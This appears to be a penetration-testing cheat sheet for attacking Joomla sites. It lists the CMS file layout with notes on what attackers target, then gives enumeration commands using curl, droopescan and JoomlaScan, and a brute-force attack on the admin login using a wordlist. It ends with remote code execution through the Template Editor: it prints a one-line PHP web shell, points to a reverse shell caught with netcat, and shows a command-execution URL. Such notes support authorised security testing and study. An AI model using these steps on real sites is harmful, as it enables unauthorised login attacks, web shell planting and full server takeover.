Joomla
Joomla is a powerful open-source content management system (CMS) used for building websites and online applications. It offers extensive customization through templates and extensions, making it suitable for blogs, business sites, e-commerce, and social networking. Known for its flexibility and strong user management system, Joomla is a popular choice among developers and businesses.
Tech Stack of Joomla
- Backend: PHP
- Frontend: HTML, CSS, JavaScript (jQuery, Bootstrap)
- Database: MySQL, MariaDB, or PostgreSQL
- Server: Apache, Nginx, or IIS
File Structure
/joomla-root
│── administrator/ # Core admin dashboard files
│── components/ # Core and third-party components (extend Joomla functionality)
│── modules/ # Site modules (display additional content and features)
│── plugins/ # Installed plugins (can be exploited if outdated)
│── templates/ # Installed templates (controls site design and layout)
│── media/ # Media uploads (potential risk for malicious file uploads)
│── libraries/ # Joomla framework and helper classes
│── language/ # Language files for multilingual support
│── includes/ # Core Joomla functions and libraries
│── configuration.php # Database credentials & security settings (critical target for attackers)
│── index.php # Main entry point of Joomla
│── htaccess.txt # Default web server configuration (must be renamed to .htaccess)
│── robots.txt # Controls search engine crawling behavior
│── cli/ # Command-line scripts for Joomla maintenance
│── installation/ # Installation scripts (should be removed after setup)
│── logs/ # System logs (useful for debugging but can expose info)
│── tmp/ # Temporary files (can be abused if not secured properly)
│── LICENSE.txt # Joomla license information
│── README.txt # Default file that may expose version info (security risk)
Enumeration
## Verify if the site is running Joomla
curl -s http://blog.rezydev.xyz/ | grep Joomla
## Note: Check 'robots.txt' it should reveal that it's Joomla Site
## Note: Check 'README.txt' at root directory which exposes some version as well
## Fingerprint Joomla Versions using xml file
curl -s http://blog.rezydev.xyz/administrator/manifests/files/joomla.xml
## Even the file 'plugins/system/cache/cache.xml' can reveal some info
## https://github.com/SamJoan/droopescan
## Note: This tool works for SilverStripe, WordPress, and Drupal also for Joomla &
## Moodle but limited features.
# Help Menu
droopescan scan --help
## Scan Joomla Site
droopescan scan joomla --url http://blog.rezydev.xyz/
## https://github.com/drego85/JoomlaScan
## Note: Requires python 2.7
## REQUIRED DEPENDENCIES
python2.7 -m pip install urllib3
python2.7 -m pip install certifi
python2.7 -m pip install bs4
## Enumerate
python2.7 joomlascan.py -u http://blog.rezydev.xyz/
Exploitation
## Bruteforce Admin Login Page
## https://github.com/ajnik/joomla-bruteforce
python3 joomla-brute.py -u http://blog.rezydev.xyz/ -w /opt/metasploit-framework/embedded/framework/data/wordlists/http_default_pass.txt --username admin
RCE with Template Editor (Need Permissions)
The Joomla Template Editor (System > Templates > Site Templates) allows modifying PHP files directly from the admin panel. Attackers with administrator or compromised credentials can inject malicious PHP code to gain Remote Code Execution (RCE).
Exploitation Steps
-
Login to Joomla as an administrator.
-
Navigate to System > Templates > Site Templates.
-
Select an active template and edit files like
index.phporerror.php, then insert:<?php system($_GET['cmd']); ?> ## OR pentestmonkey/php-reverse-shell -
Execute commands via:
http://blog.rezydev.xyz/templates/template-name/error.php?cmd=whoami
http://blog.rezydev.xyz/templates/template-name/error.php ## just visit if
## there is reverse-shell script and catch shell using netcat